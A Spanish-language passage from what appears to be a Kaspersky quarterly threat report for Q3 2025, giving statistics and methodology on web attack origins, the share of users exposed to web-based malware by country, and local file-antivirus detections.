Los datos estadísticos en esta sección se basan en los veredictos de detección del antivirus web, que protege a los usuarios al momento de descargar objetos sospechosos de una página web maliciosa o infectada. Los ciberdelincuentes crean las páginas maliciosas de manera intencionada. La infección puede afectar a los recursos web donde los usuarios generan el contenido (como los foros) o sitios legítimos que han sido hackeados.

TOP 10 de países de origen de los ataques web

Estas estadísticas muestran la distribución de los ataques de Internet bloqueados por los productos de Kaspersky (páginas web con redireccionamiento a exploits, sitios web con exploits y otros programas maliciosos, centros de control de botnets, etc.) por origen geográfico. Cabe destacar que cada host único podría haber sido la fuente de uno o más ataques web.

Para determinar el origen geográfico de los ataques web, se utilizó la técnica de asignar un nombre de dominio a la dirección IP real en la que se aloja ese dominio y establecer la ubicación geográfica de esa dirección IP (GeoIP).

En el tercer trimestre de 2025, las soluciones de Kaspersky neutralizaron 389 755 481 ataques lanzados desde recursos de Internet ubicados en todo el mundo. Se registraron 51 886 619 URL únicas en las que se activó el antivirus web.

Distribución de los orígenes de ataques web por países, tercer trimestre de 2025 (descargar)

Países y territorios en los que los usuarios estuvieron más expuestos al riesgo de infección a través de Internet

Para evaluar el grado de riesgo de infección por programas maliciosos a través de Internet al que están expuestos los equipos en diferentes países y territorios del mundo, hemos calculado para cada uno de ellos la proporción de usuarios de productos de Kaspersky en cuyos equipos ocurrieron reacciones del antivirus web durante el período del informe. Los datos obtenidos indican la agresividad del entorno en el que funcionan los equipos en diferentes países y territorios.

Cabe señalar que en este ranking solo se toman en cuenta los ataques con objetos maliciosos de la clase Malware. En los cálculos, hemos excluido las activaciones del antivirus web ante programas potencialmente peligrosos y no deseados, como RiskTool y el software publicitario.

* En los cálculos, excluimos los países y territorios donde el número de usuarios de Kaspersky es relativamente pequeño (menos de 10 000).
** Porcentaje de usuarios únicos que han sido víctimas de ataques de objetos maliciosos de clase Malware, respecto al total de usuarios únicos de productos de Kaspersky en el país o territorio.

En promedio, durante el trimestre, el 4,88 % de los dispositivos del mundo sufrieron al menos un ataque web de la clase Malware.

Amenazas locales

La estadística de las infecciones locales en las computadoras de los usuarios es un indicador importante. Aquí se incluyen los objetos que llegaron al dispositivo mediante archivos infectados o medios extraíbles, o que no fueron introducidos de forma explícita por el usuario (por ejemplo, componentes integrados en instaladores legítimos, archivos cifrados recibidos por correo, etc.).

En esta sección analizamos los datos estadísticos obtenidos a partir del funcionamiento del antivirus, que escanea los archivos del disco duro en el momento de su creación o acceso, así como los datos del escaneo de diversos soportes de información extraíbles: memorias USB, tarjetas de memoria de cámaras fotográficas, teléfonos, discos duros externos. La estadística se basa en los veredictos de detección de los módulos OAS (on-access scan) y ODS (on-demand scan) del antivirus de archivos.

En el tercer trimestre de 2025, nuestro antivirus de archivos detectó 21 356 075 objetos maliciosos y potencialmente no deseados.

Países y territorios en los que los equipos de los usuarios estuvieron expuestos a un mayor riesgo de infección local

Para cada uno de los países y territorios, calculamos la proporción de usuarios de productos de Kaspersky que experimentaron la activación del antivirus de archivos durante el período de informe. Esta estadística refleja el nivel de infección de las computadoras personales en diferentes países y territorios del mundo.

Cabe destacar que en esta clasificación solo se tienen en cuenta los ataques de objetos maliciosos de la clase Malware. En los cálculos, hemos excluido las activaciones del antivirus de archivos en programas potencialmente peligrosos o no deseados, como RiskTool y el software publicitario.

*En nuestros cálculos, hemos excluido los países donde el número de usuarios de Kaspersky es relativamente pequeño (menor a 10 000).
**Porcentaje de usuarios únicos en cuyos equipos se bloquearon amenazas locales de la clase Malware, del total de usuarios de productos de Kaspersky en el país.

En promedio, en todo el mundo, al menos una vez durante el tercer trimestre se registraron amenazas locales de clase Malware en el 12,36 % de los equipos.